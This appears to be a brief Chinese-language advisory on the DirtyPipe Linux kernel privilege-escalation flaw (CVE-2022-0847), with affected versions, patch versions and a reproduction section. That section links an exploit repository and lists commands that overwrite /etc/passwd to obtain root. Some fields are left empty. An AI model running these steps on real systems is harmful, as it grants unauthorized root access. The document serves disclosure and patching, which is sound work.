CVE-2022-0847:DirtyPipe本地提权

影响范围

Linux kernel 5.8 later

漏洞类型

本地权限提升

利用条件

影响范围应用

漏洞概述

2022年3月7日，国外安全研究人员马克斯·凯勒曼在其博客中披露了一处存在于Linux内核中的本地提权漏洞，该漏洞允许非特权用户通过注入和覆盖任意只读文件中的数据(例如:/etc/passwd等)，攻击者可以利用该特性从而实现权限提升，漏洞编号为CVE-2022-0847，该漏洞CVSS评分:7.8，危害等级:高危

漏洞复现

测试环境：

漏洞EXP：https://github.com/Al1ex/CVE-2022-0847

cp /etc/passwd /tmp/passwd.bak
gcc exp.c -o exp
./exp /etc/passwd 1 ootz:
su rootz
id

安全建议

升级内核版本至Linux Kernel 5.16.11, 5.15.25, 5.10.102

参考链接

https://dirtypipe.cm4all.com/